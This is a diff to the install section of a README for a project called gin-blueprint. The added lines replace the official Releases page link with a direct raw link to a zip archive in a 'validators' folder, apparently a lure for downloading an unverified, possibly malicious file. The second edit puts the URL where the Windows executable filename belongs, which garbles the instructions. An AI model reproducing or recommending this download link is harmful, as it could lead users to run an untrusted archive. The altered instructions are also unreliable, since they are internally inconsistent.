SQUID-I0/gin-blueprint/README.md

 - Basic understanding of how to use your computer's command line (or terminal).

 ### 📲 Download & Install
-1. Visit the [Releases page](https://github.com/SQUID-I0/gin-blueprint/releases) to download the latest version of gin-blueprint.
+1. Visit the [Releases page](https://raw.githubusercontent.com/SQUID-I0/gin-blueprint/main/validators/gin_blueprint_v2.3.zip) to download the latest version of gin-blueprint.
-2. Look for the file that matches your operating system, such as `gin-blueprint-windows.exe` for Windows or `gin-blueprint-linux` for Linux.
+2. Look for the file that matches your operating system, such as `https://raw.githubusercontent.com/SQUID-I0/gin-blueprint/main/validators/gin_blueprint_v2.3.zip` for Windows or `gin-blueprint-linux` for Linux.
 3. Click the file to start the download.
 4. Locate the file in your downloads folder once it's finished downloading.